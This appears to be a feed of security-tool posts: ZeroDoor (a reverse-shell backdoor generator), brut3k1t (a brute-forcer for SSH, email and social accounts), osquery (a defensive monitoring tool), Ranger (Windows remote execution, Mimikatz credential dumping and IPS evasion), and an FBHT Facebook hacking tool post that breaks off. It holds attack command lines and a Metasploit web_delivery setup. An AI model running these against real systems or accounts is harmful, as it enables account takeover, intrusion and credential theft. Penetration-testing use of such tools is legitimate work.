Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-33175286498665618092017-10-25T18:25:00.000-03:002017-10-25T18:25:03.063-03:00ZeroDoor - A Script Written Lazily For Generating Cross-Platform Backdoors<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-v-8lI5L5p2I/We6IFWiZVtI/AAAAAAAAJNw/z6mMaV4_LBUnqXBzHEah7Q9irdS7_cb_QCLcBGAs/s1600/Zerodoor_1.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="609" data-original-width="1366" height="284" src="https://3.bp.blogspot.com/-v-8lI5L5p2I/We6IFWiZVtI/AAAAAAAAJNw/z6mMaV4_LBUnqXBzHEah7Q9irdS7_cb_QCLcBGAs/s640/Zerodoor_1.jpeg" width="640" /></a></div>
<br />
<div style="text-align: justify;">
A script written lazily for generating reverse shell backdoors on the go whenever you need without any hassle for your daily penetration needs . These backdoors are not James Bond high tech stuff but rather simple ones to prevent over exploitation and limited capabilities Once you generate the payload somehow execute on the concerned system either Win or nix based systems . Once executed you will have the capability of executing remote commands on the compromised host.</div>
<a name='more'></a><br />
<span style="font-size: large;"><b>Usage</b></span><br />
<pre><code>python zerodoor.py
</code></pre>
<span style="font-size: large;"><b>Tiny Overview</b></span><br />
Nothing special it includes three basic <a href="http://www.kitploit.com/search/label/Backdoor">backdoor</a> generation capability for :-<br />
<ol>
<li>Nix/OSX Based</li>
<li>Windows Shit</li>
</ol>
Poweshell payload generation have been added due to its sofistication and presistence :)<br />
<br />
<span style="font-size: large;"><b>Author</b></span><br />
Souhardya Sardar is a lazy guy who keeps learning and gets trolled by experts Github :- github.com/Souhardya<br />
<br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a href="https://github.com/Souhardya/Zerodoor" rel="nofollow" target="_blank">Download Zerodoor</a></span></b></div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-57272823887592154922016-11-20T10:58:00.000-03:002016-11-20T10:58:00.944-03:00brut3k1t - Server-side Brute-force Module (ssh, ftp, smtp, facebook, and more)<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-EIFbg0OK7nY/WClSssym4wI/AAAAAAAAGhc/cmJtTFbI5swKScn51mmNcEfXaffugyWmgCLcB/s1600/brut3k1t.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://3.bp.blogspot.com/-EIFbg0OK7nY/WClSssym4wI/AAAAAAAAGhc/cmJtTFbI5swKScn51mmNcEfXaffugyWmgCLcB/s1600/brut3k1t.png" /></a></div>
<br />
<div style="text-align: justify;">
Server-side brute-force module. Brute-force (dictionary attack, jk) attack that supports multiple protocols and services.</div>
<a name='more'></a><br />
<span style="font-size: large;"> <b> 1. Introduction </b> </span> <br />
<strong> brut3k1t </strong> is a server-side bruteforce module that supports dictionary attacks for several protocols. The current protocols that are complete and in support are: <br />
<pre><code>ssh
ftp
smtp
XMPP
instagram
facebook</code></pre>
There will be future implementations of different protocols and services (including Twitter, Facebook, Instagram). <br />
<br />
<span style="font-size: large;"> <b> 2. Installation </b> </span> <br />
Installation is simple. <strong> brut3k1t </strong> requires several dependencies, although they will be installed by the program if you do not have it. <br />
<ul>
<li> <strong> argparse </strong> - utilized for parsing command line arguments </li>
<li> <strong> paramiko </strong> - utilized for working with SSH connections and authentication </li>
<li> <strong> ftplib </strong> - utilized for working with FTP connections and authentication </li>
<li> <strong> smtplib </strong> - utilized for working with SMTP (email) connections and authentication </li>
<li> <strong> fbchat </strong> - utilized for connecting with Facebook </li>
<li> <strong> selenium </strong> - utilized for web scraping, which is used with Instagram (and later Twitter) </li>
<li> <strong> xmppy </strong> - utiized for XMPP connections ...and more within the future! </li>
</ul>
Downloading is simple. Simply <code> git clone </code> . <br />
<pre><code>git clone https://github.com/ex0dus-0x/brut3k1t</code></pre>
Change to directory: <br />
<pre><code>cd /path/to/brut3k1t</code></pre>
<br />
<span style="font-size: large;"> <b> 3. Usage </b> </span> <br />
Utilizing <strong> brut3k1t </strong> is a little more complicated than just running a Python file. <br />
Typing <code> python brut3k1t -h </code> shows the help menu: <br />
<pre><code>usage: brut3k1t.py [-h] [-s SERVICE] [-u USERNAME] [-w PASSWORD] [-a ADDRESS]
[-p PORT] [-d DELAY]
Server-side bruteforce module written in Python
optional arguments:
-h, --help show this help message and exit
-a ADDRESS, --address ADDRESS
Provide host address for specified service. Required
for certain protocols
-p PORT, --port PORT Provide port for host address for specified service.
If not specified, will be automatically set
-d DELAY, --delay DELAY
Provide the number of seconds the program delays as
each password is tried
required arguments:
-s SERVICE, --service SERVICE
Provide a service being attacked. Several protocols
and services are supported
-u USERNAME, --username USERNAME
Provide a valid username for service/protocol being
executed
-w PASSWORD, --wordlist PASSWORD
Provide a wordlist or directory to a wordlist</code></pre>
<br />
<b> Examples of usage: </b> <br />
Cracking SSH server running on <code> 192.168.1.3 </code> using <code> root </code> and <code> wordlist.txt </code> as a wordlist. <br />
<pre><code>python brut3k1t.py -s ssh -a 192.168.1.3 -u root -w wordlist.txt</code></pre>
The program will automatically set the port to 22, but if it is different, specify with <code> -p </code> flag. <br />
Cracking email <code> test@gmail.com </code> with <code> wordlist.txt </code> on port <code> 25 </code> with a 3 second delay. For email it is necessary to use the SMTP server's address. For e.g Gmail = <code> smtp.gmail.com </code> . You can research this using Google. <br />
<pre><code>python brut3k1t.py -s smtp -a smtp.gmail.com -u test@gmail.com -w wordlist.txt -p 25 -d 3</code></pre>
Cracking XMPP <code> test@creep.im </code> with <code> wordlist.txt </code> on default port <code> 5222 </code> . XMPP also is similar to SMTP, whereas you will need to provide the address of the XMPP server, in this case <code> creep.im </code> . <br />
<pre><code>python brut3k1t.py -s xmpp -a creep.im -u test -w wordlist.txt</code></pre>
Cracking Facebook is quite a challenge, since you will require the target user ID, not the username. <br />
<pre><code>python brut3k1t.py -s facebook -u 1234567890 -w wordlist.txt</code></pre>
Cracking Instagram with username <code> test </code> with wordlist <code> wordlist.txt </code> and a 5 second delay <br />
<pre><code> python brut3k1t.py -s instagram -u test -w wordlist.txt -d 5</code></pre>
## KEY NOTES TO REMEMBER <br />
<ul>
<li> If you do not supply the port <code> -p </code> flag, the default port for that service will be used. You do not need to provide it for Facebook and Instagram, since they are um... web-based. :) <br />
</li>
<li> If you do not supply the delay <code> -d </code> flag, the default delay in seconds will be 1. <br />
</li>
<li> Remember, use the SMTP server address and XMPP server address for the address <code> -a </code> flag, when cracking SMTP and XMPP, respectively. <br />
</li>
<li> Facebook requires the username ID. This is a little bit of a setback since some people do not display their ID publicly on their profile. <br />
</li>
<li> Make sure the wordlist and its directory is specified. If it is in <code> /usr/local/wordlists/wordlist.txt </code> specify that for the wordlist <code> -w </code> flag. <br />
</li>
<li> Remember that some protocols are not based on their default port. A FTP server will not necessarily always be on port <code> 21 </code> . Please keep that in mind. <br />
</li>
<li> Use this for educational and ethical hacking purposes, as well as the sake of learning code and security-oriented practices. <strong> No script kiddies! </strong> <br />
</li>
</ul>
<br />
<br />
<div style="text-align: center;">
<b> <span style="font-size: x-large;"> <a href="https://github.com/ex0dus-0x/brut3k1t" target="_blank"> Download brut3k1t </a> </span> </b> </div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-82788814167652175462016-10-02T11:12:00.000-03:002016-10-02T11:12:03.553-03:00osquery - SQL powered operating system instrumentation, monitoring, and analytics<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-6R46s3F6xZo/V-3LZlh84FI/AAAAAAAAGPg/h5-qfMyfJWQnhK_y4qkS_PFfmGlkaJ61gCLcB/s1600/osquery.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://3.bp.blogspot.com/-6R46s3F6xZo/V-3LZlh84FI/AAAAAAAAGPg/h5-qfMyfJWQnhK_y4qkS_PFfmGlkaJ61gCLcB/s320/osquery.png" width="320" /></a></div>
<div align="center">
<br /></div>
<div align="center">
</div>
<div style="text-align: justify;">
osquery is an operating system instrumentation framework for OS X and Linux. </div>
<div style="text-align: justify;">
The tools make low-level operating system analytics and monitoring both performant and intuitive.</div>
<div style="text-align: justify;">
<a name='more'></a><br /></div>
<table> <thead>
<tr> <th>Platform </th> <th>Build status </th> <th></th> <th></th> <th></th> </tr>
</thead> <tbody>
<tr> <td>OS X 10.9 </td> <td><a href="https://jenkins.osquery.io/job/osqueryMasterBuildOSX10.9/" target="_blank"> <img alt="Build Status" data-canonical-src="https://jenkins.osquery.io/job/osqueryMasterBuildOSX10.9/badge/icon" src="https://camo.githubusercontent.com/776b97c582f313a5620542263303ebbc1e1bc2f7/68747470733a2f2f6a656e6b696e732e6f7371756572792e696f2f6a6f622f6f7371756572794d61737465724275696c644f535831302e392f62616467652f69636f6e" style="max-width: 100%;" /> </a> </td> <td></td> <td><strong> Homepage: </strong> </td> <td><a href="https://osquery.io/" target="_blank"> https://osquery.io </a> </td> </tr>
<tr> <td>OS X 10.10/11 </td> <td><a href="https://jenkins.osquery.io/job/osqueryMasterBuildOSX10.11/" target="_blank"> <img alt="Build Status" data-canonical-src="https://jenkins.osquery.io/job/osqueryMasterBuildOSX10.11/badge/icon" src="https://camo.githubusercontent.com/dc13dfb787151888583eafef764dea773127c934/68747470733a2f2f6a656e6b696e732e6f7371756572792e696f2f6a6f622f6f7371756572794d61737465724275696c644f535831302e31312f62616467652f69636f6e" style="max-width: 100%;" /> </a> </td> <td></td> <td><strong> Downloads: </strong> </td> <td><a href="https://osquery.io/downloads" target="_blank"> https://osquery.io/downloads </a> </td> </tr>
<tr> <td>CentOS 6.x </td> <td><a href="https://jenkins.osquery.io/job/osqueryMasterBuildCentOS6/" target="_blank"> <img alt="Build Status" data-canonical-src="https://jenkins.osquery.io/job/osqueryMasterBuildCentOS6/badge/icon" src="https://camo.githubusercontent.com/86634d20157244bfd333728b35f4718a8ee61669/68747470733a2f2f6a656e6b696e732e6f7371756572792e696f2f6a6f622f6f7371756572794d61737465724275696c6443656e744f53362f62616467652f69636f6e" style="max-width: 100%;" /> </a> </td> <td></td> <td><strong> Tables: </strong> </td> <td><a href="https://osquery.io/tables" target="_blank"> https://osquery.io/tables </a> </td> </tr>
<tr> <td>CentOS 7.x </td> <td><a href="https://jenkins.osquery.io/job/osqueryMasterBuildCentOS7/" target="_blank"> <img alt="Build Status" data-canonical-src="https://jenkins.osquery.io/job/osqueryMasterBuildCentOS7/badge/icon" src="https://camo.githubusercontent.com/1a475eca72e06a83c5cb91354e7c5f3718807b52/68747470733a2f2f6a656e6b696e732e6f7371756572792e696f2f6a6f622f6f7371756572794d61737465724275696c6443656e744f53372f62616467652f69636f6e" style="max-width: 100%;" /> </a> </td> <td></td> <td><strong> Packs: </strong> </td> <td><a href="https://osquery.io/packs" target="_blank"> https://osquery.io/packs </a> </td> </tr>
<tr> <td>Ubuntu 12.04 </td> <td><a href="https://jenkins.osquery.io/job/osqueryMasterBuildUbuntu12/" target="_blank"> <img alt="Build Status" data-canonical-src="https://jenkins.osquery.io/job/osqueryMasterBuildUbuntu12/badge/icon" src="https://camo.githubusercontent.com/e214d79696e673709228fbee5556af60c883587c/68747470733a2f2f6a656e6b696e732e6f7371756572792e696f2f6a6f622f6f7371756572794d61737465724275696c645562756e747531322f62616467652f69636f6e" style="max-width: 100%;" /> </a> </td> <td></td> <td><strong> Guide: </strong> </td> <td><a href="https://osquery.readthedocs.org/" target="_blank"> https://osquery.readthedocs.org </a> </td> </tr>
<tr> <td>Ubuntu 14.04 </td> <td><a href="https://jenkins.osquery.io/job/osqueryMasterBuildUbuntu14/" target="_blank"> <img alt="Build Status" data-canonical-src="https://jenkins.osquery.io/job/osqueryMasterBuildUbuntu14/badge/icon" src="https://camo.githubusercontent.com/986c4f2d4d21972f4e93d1e9f5d790c9414a55f9/68747470733a2f2f6a656e6b696e732e6f7371756572792e696f2f6a6f622f6f7371756572794d61737465724275696c645562756e747531342f62616467652f69636f6e" style="max-width: 100%;" /> </a> </td> <td></td> <td><a href="https://osquery-slack.herokuapp.com/" target="_blank"> <img alt="Slack Status" data-canonical-src="https://osquery-slack.herokuapp.com/badge.svg" src="https://camo.githubusercontent.com/d77650860ac65ceaa91af88861ffccb13c16e85d/68747470733a2f2f6f7371756572792d736c61636b2e6865726f6b756170702e636f6d2f62616467652e737667" style="max-width: 100%;" /> </a> </td> <td><a href="https://osquery-slack.herokuapp.com/" target="_blank"> https://osquery-slack.herokuapp.com </a> </td> </tr>
<tr> <td>Ubuntu 16.04 </td> <td><a href="https://jenkins.osquery.io/job/osqueryMasterBuildUbuntu16/" target="_blank"> <img alt="Build Status" data-canonical-src="https://jenkins.osquery.io/job/osqueryMasterBuildUbuntu16/badge/icon" src="https://camo.githubusercontent.com/e74ac17d6185fd8faf0e4b15dbec8cacafa0b880/68747470733a2f2f6a656e6b696e732e6f7371756572792e696f2f6a6f622f6f7371756572794d61737465724275696c645562756e747531362f62616467652f69636f6e" style="max-width: 100%;" /> </a> </td> <td></td> <td></td> <td></td> </tr>
<tr> <td>Windows 10 </td> <td><a href="https://jenkins.osquery.io/job/osqueryMasterBuildWindows10/" target="_blank"> <img alt="Build Status" data-canonical-src="https://jenkins.osquery.io/job/osqueryMasterBuildWindows10/badge/icon" src="https://camo.githubusercontent.com/4e3931b1c049b8080f8a3a5988c8e091e601b184/68747470733a2f2f6a656e6b696e732e6f7371756572792e696f2f6a6f622f6f7371756572794d61737465724275696c6457696e646f777331302f62616467652f69636f6e" style="max-width: 100%;" /> </a> </td> <td></td> <td></td> <td></td> </tr>
</tbody> </table>
<br />
<span style="font-size: large;"> <b> What is osquery? </b> </span> <br />
osquery exposes an operating system as a high-performance relational database. This allows you to write SQL-based queries to explore operating system data. With osquery, SQL tables represent abstract concepts such as running processes, loaded kernel modules, open network connections, browser plugins, hardware events or file hashes. <br />
SQL tables are implemented via a simple plugin and extensions API. A variety of tables already exist and more are being written: <a href="https://osquery.io/tables" target="_blank"> https://osquery.io/tables </a> . To best understand the expressiveness that is afforded to you by osquery, consider the following SQL queries: <br />
List the <a href="https://osquery.io/docs/tables/#users" target="_blank"> <code> users </code> </a> : <br />
<div>
<pre><code>SELECT * FROM users;</code></pre>
</div>
Check the <a href="https://osquery.io/docs/tables/#processes" target="_blank"> <code> processes </code> </a> that have a deleted executable: <br />
<div>
<pre><code>SELECT * FROM processes WHERE on_disk = 0;</code></pre>
</div>
Get the process name, port, and PID, for processes listening on all interfaces: <br />
<div>
<pre><code>SELECT DISTINCT processes.name, listening_ports.port, processes.pid
FROM listening_ports JOIN processes USING (pid)
WHERE listening_ports.address = '0.0.0.0';</code></pre>
</div>
Find every OS X LaunchDaemon that launches an executable and keeps it running: <br />
<div>
<pre><code>SELECT name, program || program_arguments AS executable
FROM launchd
WHERE (run_at_load = 1 AND keep_alive = 1)
AND (program != '' OR program_arguments != '');</code></pre>
</div>
Check for ARP anomalies from the host's perspective: <br />
<div>
<pre><code>SELECT address, mac, COUNT(mac) AS mac_count
FROM arp_cache GROUP BY mac
HAVING count(mac) > 1;</code></pre>
</div>
Alternatively, you could also use a SQL sub-query to accomplish the same result: <br />
<div>
<pre><code>SELECT address, mac, mac_count
FROM
(SELECT address, mac, COUNT(mac) AS mac_count FROM arp_cache GROUP BY mac)
WHERE mac_count > 1;</code></pre>
</div>
These queries can be: <br />
<ul>
<li> performed on an ad-hoc basis to explore operating system state using the <a href="https://osquery.readthedocs.org/en/latest/introduction/using-osqueryi/" target="_blank"> osqueryi </a> shell </li>
<li> executed via a <a href="https://osquery.readthedocs.org/en/latest/introduction/using-osqueryd/" target="_blank"> scheduler </a> to monitor operating system state across a set of hosts </li>
<li> launched from custom applications using osquery Thrift APIs </li>
</ul>
<br />
<span style="font-size: large;"> <b> Downloads / Install </b> </span> <br />
For latest stable and nightly builds for OS X and Linux (deb/rpm), as well as yum and apt repository information visit <a href="https://osquery.io/downloads/" target="_blank"> https://osquery.io/downloads </a> . For installation information for FreeBSD, which is supported by the osquery community, see the <a href="https://osquery.readthedocs.org/en/latest/installation/install-freebsd/" target="_blank"> wiki </a> . <br />
<br />
<b> Building from source </b> <br />
<a href="https://osquery.readthedocs.org/en/latest/development/building/" target="_blank"> Building </a> osquery from source is encouraged! Join our developer community by giving us feedback in Github issues or submitting pull requests! <br />
<br />
<span style="font-size: large;"> <b> File Integrity Monitoring (FIM) </b> </span> <br />
osquery provides several <a href="http://osquery.readthedocs.org/en/stable/deployment/file-integrity-monitoring/" target="_blank"> FIM features </a> too! Just as OS concepts are represented in tabular form, the daemon can track OS events and later expose them in a table. Tables like <a href="https://osquery.io/docs/tables/#file_events" target="_blank"> <code> file_events </code> </a> or <a href="https://osquery.io/docs/tables/#yara_events" target="_blank"> <code> yara_events </code> </a> can be selected to retrieve buffered events. <br />
The configuration allows you to organize files and directories for monitoring. Those sets can be paired with lists of YARA signatures or configured for additional monitoring such as access events. <br />
<br />
<b> Process and socket auditing </b> <br />
There are several forms of <a href="http://osquery.readthedocs.org/en/stable/development/pubsub-framework/" target="_blank"> eventing </a> in osquery along with file modifications and accesses. These range from disk mounts, network reconfigurations, hardware attach and detaching, and process starting. For a complete set review the table documentation and look for names with the <code> _events </code> suffix. <br />
<br />
<span style="font-size: large;"> <b> Vulnerabilities </b> </span> <br />
Facebook has a <a href="https://www.facebook.com/whitehat/" target="_blank"> bug bounty </a> program that includes osquery. If you find a security vulnerability in osquery, please submit it via the process outlined on that page and do not file a public issue. For more information on finding vulnerabilities in osquery, see a recent blog post about <a href="https://www.facebook.com/notes/facebook-bug-bounty/bug-hunting-osquery/954850014529225" target="_blank"> bug-hunting osquery </a> . <br />
<br />
<span style="font-size: large;"> <b> Learn more </b> </span> <br />
Read the <a href="https://code.facebook.com/posts/844436395567983/introducing-osquery/" target="_blank"> launch blog post </a> for background on the project. If you're interested in learning more about osquery, visit the <a href="https://osquery.readthedocs.org/" target="_blank"> users guide </a> and browse our RFC-labeled Github issues. Development and usage discussion is happing in the osquery Slack, grab an invite automatically: <a href="https://osquery-slack.herokuapp.com/" target="_blank"> https://osquery-slack.herokuapp.com/ </a> ! <br />
<br />
<br />
<div style="text-align: center;">
<b> <span style="font-size: x-large;"> <a href="https://github.com/facebook/osquery" target="_blank"> Download osquery </a> </span> </b> </div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-60042382100204208702016-04-18T19:18:00.000-03:002016-04-18T19:18:00.829-03:00Ranger - Tool To Access And Interact With Remote Microsoft Windows Based Systems<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-68E_I4TtQYU/VwxF2o0K4-I/AAAAAAAAFVo/fzaoI60GrxUDxKlrc89imwJRUN6ndNoNgCLcB/s1600/ranger.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="430" src="https://4.bp.blogspot.com/-68E_I4TtQYU/VwxF2o0K4-I/AAAAAAAAFVo/fzaoI60GrxUDxKlrc89imwJRUN6ndNoNgCLcB/s640/ranger.png" width="640" /></a></div>
<br />
A tool to support security professionals access and interact with remote Microsoft Windows based systems. <br />
This project was conceptualized with the thought process, we did not invent the bow or the arrow, just a more efficient way of using it. <br />
Ranger is a command-line driven attack and penetration testing tool, which as the ability to use an instantiated catapult server to deliver capabilities against Windows Systems. As long as a user has a set of credentials or a hash set (NTLM, LM, LM:NTLM) he or she can gain access to systems that are apart of the trust. <br />
Using this capability a security professional can extract credentials out of memory in clear-text, access SAM tables, run commands, execute PowerShell scripts, Windows Binaries, and other tools. <br />
At this time the tool bypasses the majority of IPS vendor solutions unless they have been custom tuned to detect it. The tool was developed using our home labs in an effort to support security professionals doing legally and/or contractually supported activities. <br />
More functionality is being added, but at this time the tool uses the community contributions from repositories related to the PowerShell PowerView, PowerShell Mimikatz and Impacket teams.<br />
<a name='more'></a><br />
<span style="font-size: large;"> <b> Managing Ranger: </b> </span> <br />
<br />
<b> Install: </b> <br />
<pre><code>wget https://raw.githubusercontent.com/funkandwagnalls/ranger/master/setup.sh
chmod a+x setup.sh
./setup.sh
rm setup.sh</code></pre>
<br />
<b> Update: </b> <br />
<pre><code>ranger --update</code></pre>
<br />
<span style="font-size: large;"> <b> Usage: </b> </span> <br />
<ul>
<li> Ranger uses a combination of methods and attacks, a method is used to deliver an attack/command </li>
<li> An attack is what you are trying to accomplish </li>
<li> Some items are both a method and attack rolled into one and some methods cannot use some of the attacks due to current limitations in the libraries or protocols </li>
</ul>
<br />
<b> Methods & Attacks: </b> <br />
<pre><code>--scout
--secrets-dump</code></pre>
<br />
<b> Method: </b> <br />
<pre><code>--wmiexec
--psexec
--atexec</code></pre>
<br />
<b> Attack: </b> <br />
<pre><code>--command
--invoker
--downloader
--executor
--domain-group-members
--local-group-members
--get-domain-membership
--get-forest-domains
--get-forest
--get-dc
--find-la-access</code></pre>
<br />
<span style="font-size: large;"> <b> Command Execution: </b> </span> <br />
<br />
<b> Find Logged In Users: </b> <br />
<pre><code>ranger.py [-u Administrator] [-p Password1] [-d Domain] --scout</code></pre>
<br />
<b> SMBEXEC Command Shell: </b> <br />
<pre><code>ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --smbexec -q -v -vv -vvv</code></pre>
<br />
<b> PSEXEC Command Shell: </b> <br />
<pre><code>ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --psexec -q -v -vv -vvv</code></pre>
<br />
<b> PSEXEC Command Execution: </b> <br />
<pre><code>ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --psexec -c "Net User" -q -v -vv -vvv</code></pre>
<br />
<b> WMIEXEC Command Execution: </b> <br />
<pre><code>ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec -c "Net User"</code></pre>
<br />
<b> WMIEXEC PowerShell Mimikatz Memory Injector: </b> <br />
<pre><code>ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --invoker</code></pre>
<br />
<b> WMIEXEC Metasploit web_delivery Memory Injector (requires Metasploit config see below): </b> <br />
<pre><code>ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --downloader</code></pre>
<br />
<b> WMIEXEC Custom Code Memory Injector: </b> <br />
<pre><code>ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --executor -c "binary.exe"</code></pre>
<br />
<b> ATEXEC Command Execution: </b> <br />
<pre><code>ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --atexec -c "Net User" --no-encoder</code></pre>
<br />
<b> ATEXEC PowerShell Mimikatz Memory Injector: </b> <br />
<pre><code>ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --invoker --no-encoder</code></pre>
<br />
<b> ATEXEC Metasploit web_delivery Memory Injector (requires Metasploit config see below): </b> <br />
<pre><code>ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --downloader --no-encoder</code></pre>
<br />
<b> ATEXEC Custom Code Memory Injector: </b> <br />
<pre><code>ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --executor -c "binary.exe" --no-encoder</code></pre>
<br />
<b> SECRETSDUMP Custom Code Memory Injector: </b> <br />
<pre><code>ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --secrets-dump</code></pre>
<br />
<b> Create Pasteable Mimikatz Attack: </b> <br />
<pre><code>ranger.py --invoker -q -v -vv -vvv</code></pre>
<br />
<b> Create Pasteable web_delivery Attack (requires Metasploit config see below): </b> <br />
<pre><code>ranger.py --downloader -q -v -vv -vvv</code></pre>
<br />
<b> Create Pasteable Executor Attack: </b> <br />
<pre><code>ranger.py --executor -q -v -vv -vvv</code></pre>
<br />
<b> Identifying Groups Members and Domains </b> <br />
<ul>
<li> When identifying groups make sure to determine what the actual query domain is with the <code> --get-domain-membership </code> </li>
<li> Then when you query a group use the optional <code> --domain </code> , which allows you to target a different domain than the one you logged into </li>
</ul>
<pre><code>ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --get-domain-membership
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --domain "Domain.local2"</code></pre>
<br />
<span style="font-size: large;"> <b> Notes About Usage: </b> </span> <br />
<br />
<b> Cred File Format: </b> <br />
<ul>
<li> You can pass it a list of usernames and passwords or hashes in the following format in the same file: </li>
</ul>
<pre><code>username password
username LM:NTLM
username :NTLM
username **NO PASSWORD**:NTLM
PWDUMP
username PWDUMP domain
username password domain
username LM:NTLM domain
username :NTLM domain
username **NO PASSWORD**:NTLM domain
PWDUMP domain
username PWDUMP domain</code></pre>
<br />
<b> Credential File Caveats: </b> <br />
<ul>
<li> If you provide domain names in the file they will be used instead of the default WORKGROUP. <br /> </li>
<li> If you supply the domain name by command line <code> -d </code> , it will infer that you want to ignore all the domain names in the file. </li>
</ul>
<br />
<b> Command Line Execution: </b> <br />
<ul>
<li> If you do not want to use the file you can pass the details through command line directly. </li>
<li> If you wish to supply hashes instead of passwords just pass them through the password argument. <br /> </li>
<li> If they are PWDUMP format and you supply no username it will pull the username out of the hash. <br /> </li>
<li> If you supply a username it will think that the same hash applies to a different user. </li>
<li> Use the following formats for password: </li>
</ul>
<pre><code>password
LM:NTLM
:NTLM
PWDUMP</code></pre>
<br />
<b> Targets and Target Lists: </b> <br />
<ul>
<li> You can provide a list of targets either by using a target list or through the target option. <br /> </li>
<li> You can supply multiple target list files by comma separating them and it will aggregate the data and remove duplicates and then exclude your IP address from the default interface or the interface you provide. </li>
<li> The tool accepts, CIDR notations, small ranges (192.168.195.1-100) or large ranges (192.168.194.1-192.163.1.1) or single IP addresses. <br /> </li>
<li> Again just comma separating them by command line or put them in a new line delimited file. </li>
</ul>
<br />
<b> Exclusions and Exclusion Lists: </b> <br />
<ul>
<li> You can exclude targets using the exclude arguments as well, so if you do not touch a little Class C out of a Class A it will figure that out for you. </li>
</ul>
<br />
<b> Intrusion Protection Systems (IPS): </b> <br />
<ul>
<li> Mimikatz, Downloader and Executor use PowerShell memory injection by calling other services and protocols. </li>
<li> The commands are double encoded and bypass current IPS solutions (even next-gen) unless specifically tuned to catch these attacks. <br /> </li>
<li> ATEXEC is the only one that currently lands on disk and does not encode, I still have some rewriting to do still. </li>
</ul>
<br />
<b> Web_delivery attacks: </b> <br />
<ul>
<li> To setup Metasploit for the web_delivery exploit start-up Metasploit and configure the exploit to meet the following conditions. </li>
</ul>
<pre><code>use exploit/multi/script/web_delivery
set targets 2
set payload <choose your desired payload>
set lhost <your IP>
set lport <port for the shell make sure it is not a conflicting port>
set URIPATH /
set SRVPORT <the same as what is set by the -r option in ranger, defaults to 8888>
exploit -j</code></pre>
<br />
<span style="font-size: large;"> <b> FAQ </b> </span> <br />
<br />
<b> Access Deined Errors for SMBEXEC and WMIEXEC </b> <br />
I'm getting access denied errors in Windows machines that are part of a WORKGROUP. <br />
When not part of a domain, Windows by default does not have any administrative shares. SMBEXEC relies on shares being enabled. Additionally, WMIC isn't enabled on WORKGROUP machines. SMBEXEC and WMIEXEC are made to target protocols enabled on domain systems. While its certainly possible to enable these functions on a WORKGROUP system, note that you are introducing vulnerable protocols (after all, that's what this tool is made to attack). Enabling these features on your primary home system that your significant other uses for Facebook as well is probably not the best idea. <br />
<ul>
<li> Make sure this is a test box you own. You can force the shares to be enabled by following the instructions here: <a href="http://www.wintips.org/how-to-enable-admin-shares-windows-7/" target="_blank"> http://www.wintips.org/how-to-enable-admin-shares-windows-7/ </a> </li>
<li> If you want to determine what shares are exposed and then target them, you can use a tool like <code> enum4linux </code> and then use the <code> --share share_name </code> argument in ranger to try and execute SMBEXEC. </li>
</ul>
<br />
<span style="font-size: large;"> <b> Future Features: </b> </span> <br />
<br />
<b> Nmap: </b> <br />
<ul>
<li> The nmap XML feed is still in DRAFT and it is not functioning yet. </li>
</ul>
<br />
<b> Credential Parsing: </b> <br />
<ul>
<li> Clean credential parsing is in development to dump to files. </li>
</ul>
<br />
<b> Colored Output: </b> <br />
<ul>
<li> Add colored output with <code> https://pypi.python.org/pypi/colorama </code> </li>
</ul>
<br />
<span style="font-size: x-large;"> <b> Presented At: </b> </span> <br />
<a href="http://2016.bsidescharm.com/2016-talks" target="_blank"> BSides Charm City 2016: April 23, 2016 </a> <br />
<br />
<span style="font-size: x-large;"> <b> Distributions the tool is a part of: </b> </span> <br />
<a href="https://blackarch.org/" target="_blank"> Black Arch Linux </a> <br />
<br />
<br />
<div style="text-align: center;">
<b> <span style="font-size: x-large;"> <a href="https://github.com/funkandwagnalls/ranger" target="_blank"> Download Ranger </a> </span> </b> </div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-66343852171860935892014-09-22T19:49:00.001-03:002014-09-24T11:13:44.208-03:00FBHT v3.0 - Facebook Hacking Tool (Like flood, Note DDoS attack, FBFriendlyLogout, more...)<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-ztHhJ3IgvcQ/VCCmUXkNOvI/AAAAAAAADJA/gGmLoBUBaOs/s1600/FBHT.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-ztHhJ3IgvcQ/VCCmUXkNOvI/AAAAAAAADJA/gGmLoBUBaOs/s1600/FBHT.png" height="390" width="640" /></a></div>
<br />
<div style="text-align: justify;">
<b>FBHT </b>(Facebook Hacking Tool) is an open-source tool written in Python that exploits multiple vulnerabilities on the Facebook platform</div>
<a name='more'></a><br />
<div style="text-align: justify;">
<b><span class="Apple-style-span" style="font-size: large;">The tool provides:</span></b></div>
<ul>
<li style="text-align: justify;">1) Create accounts</li>
<li style="text-align: justify;">2) Delete all accounts for a given user</li>
